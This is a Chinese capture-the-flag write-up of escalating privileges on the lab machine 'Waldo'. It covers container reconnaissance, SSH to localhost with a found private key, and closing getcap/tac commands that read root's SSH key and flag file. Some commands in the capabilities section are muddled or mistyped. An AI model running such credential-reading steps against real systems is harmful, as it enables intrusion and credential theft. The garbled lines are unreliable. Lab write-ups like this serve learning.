waldo（docker虚拟机-linux capabilities提权）

拿到一个ssh shell，准备提权。

trying

1

uname -a
Linux waldo 4.9.0-6-amd64 

无gcc

2

cat /etc/passwd | grep home
nobody:x:65534:65534:nobody:/home/nobody:/bin/sh

普通用户就一个

sudo -l
-sh: sudo: not found

su root
-sh: su: not found

意识到su命令不可能没有，于是想要反弹一个bash shell

ssh -i id_rsa nobody@10.10.10.87 bash
sh: bash: not found

喵喵喵？？于是回头看一下/etc/passwd。root:x:0:0:root:/root:/bin/ash

哦哦~

ssh -i id_rsa nobody@10.10.10.87 ash
成功得到ash shell，但遗憾的是ash 和 sh没有太大区别

尝试用python，但是os.py被删掉了==

python -c 'import pty; pty.spawn("/bin/bash")'

3

ps -ef | grep root

root       1:57 {supervisord} /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root       0:00 nginx: master process nginx -g daemon off;
root       0:00 /usr/sbin/sshd -D -e
root       0:27 {php-fpm7} php-fpm: master process (/etc/php7/php-fpm.conf)
root       0:00 sshd: nobody [priv]
nobody     0:00 grep root

/etc/php7/php-fpm.d
-rw-r--r--    1 root     root         18767 Mar 31  2018 www.conf
-rw-r--r--    1 root     root          1374 May  3  2018 zzz_custom.conf
no thing intersting here

4

cd /
ls -al .dockerenv
-rwxr-xr-x    1 root     root             0 May  3  2018 .dockerenv

说明这是一个虚拟机容器，(⊙﹏⊙)，虚拟机逃逸怎么做？

find . -name "docker"
find: ./proc/tty/driver: Permission denied
find: ./proc/1/task/1/fd: Permission denied
find: ./proc/1/task/1/fdinfo: Permission denied
find: ./proc/1/task/1/ns: Permission denied
find: ./proc/1/fd: Permission denied
。。。省略。。。

ifconfig
docker0   Link encap:Ethernet  HWaddr 02:42:E2:B2:82:F0  
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

ens33     Link encap:Ethernet  HWaddr 00:50:56:A4:3E:15  
          inet addr:10.10.10.87  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:394742 errors:0 dropped:166 overruns:0 frame:0
          TX packets:221201 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:27756425 (26.4 MiB)  TX bytes:18990614 (18.1 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1410 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1410 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:259632 (253.5 KiB)  TX bytes:259632 (253.5 KiB)

ping 172.17.0.1
PING 172.17.0.1 (172.17.0.1): 56 data bytes
ping: permission denied (are you root?)

在freebuf、乌云镜像中，虚拟机逃逸的文都很少==

看看writeup。

用这条命令，可以检查现有的shell是不是运行在docker容器中。 grep -i docker /proc/self/cgroup 2>/dev/null;find / -name "*dockerenv*" - exec ls -la {} \; 2>/dev/null

netstat命令

Linux netstat命令详解 netstat without netstat

在home家目录下，有一个公钥，暗示了一个用户monitor。 .monitor是私钥

sshd_config

cat /etc/ssh/sshd_config

#	$OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/bin:/usr/bin:/sbin:/usr/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 8888
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_dsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile	.ssh/authorized_keys

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
#UsePAM no

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem	sftp	/usr/lib/ssh/sftp-server

# the following are HPN related configuration options
# tcp receive buffer polling. disable in non autotuning kernels
#TcpRcvBufPoll yes
 
# disable hpn performance boosts
#HPNDisabled no

# buffer size for hpn to non-hpn connections
#HPNBufferSize 2048


# Example of overriding settings on a per-user basis
#Match User anoncvs
#	X11Forwarding no
#	AllowTcpForwarding no
#	PermitTTY no
#	ForceCommand cvs server
AllowUsers nobody

ListenAddress 0.0.0.0 ssh监听本地地址

获得另一个shell

monitor rshell

通过以上信息搜集，知道这是一个docker虚拟机。这个主机/etc/passwd，没有monitor用户，但是home目录有ssh私钥。通过查看ssh配置文件，得知监听本地端口。

于是我们可以尝试连接本地，来访问宿主机。

ssh monitor@127.0.0.1 -i .monitor -t bash 用这条命令，得到bash shell

比较一下ssh加-t、不加-t

cat，command not found

直观来看，加-t参数，有些命令没有，可能是环境变量的原因。

不加-t参数，虽然命令都有，但是显示起来，回显没有颜色，不直观。

其余的东西，因时间所限，以后再找一下相关资料。

提权前的信息搜集

有三个普通用户

steve:x:1000:1000:steve,,,:/home/steve:/bin/bash
monitor:x:1001:1001:User for editing source and monitoring logs,,,:/home/monitor:/bin/rbash
app-dev:x:1002:1002:User for managing app-dev,,,:/home/app-dev:/bin/bash

/home/monitor

ls -al
total 40
drwxr-x--- 5 root    monitor 4096 Jul 24 07:58 .
drwxr-xr-x 5 root    root    4096 May  3  2018 ..
drwxrwx--- 3 app-dev monitor 4096 May  3  2018 app-dev
lrwxrwxrwx 1 root    root       9 Jul 24 07:58 .bash_history -> /dev/null
-r--r----- 1 root    monitor   15 May  3  2018 .bash_login
-r--r----- 1 root    monitor   15 May  3  2018 .bash_logout
-r--r----- 1 root    monitor   15 May  3  2018 .bash_profile
-r--r----- 1 root    monitor 3598 May  3  2018 .bashrc
dr-xr-x--- 2 root    monitor 4096 May  3  2018 bin
-r--r----- 1 root    monitor   15 May  3  2018 .profile
dr-x------ 2 monitor monitor 4096 May  3  2018 .ssh

ls -iR

656302 app-dev
656301 bin

./app-dev:
656314 logMonitor
656315 logMonitor.bak
656309 logMonitor.c
656310 logMonitor.h
656312 logMonitor.h.gch
656313 logMonitor.o
656311 makefile
656303 v0.1

./app-dev/v0.1:
656316 logMonitor-0.1

./bin:
656305 ls
656307 most
656306 red
656308 rnano

getcap -r * 2>/dev/null
/usr/bin/tac -s @ /root/.ssh/id_rsa
/usr/bin/tac | /root/.ssh/id_rsa | /usr/bin/tac
tac /root/root.txt

总结：

getcap、tac、docker虚拟机、linux capabilities等概念都是第一次遇到==

下一次单独开一篇，探讨下权限问题。

唉~头疼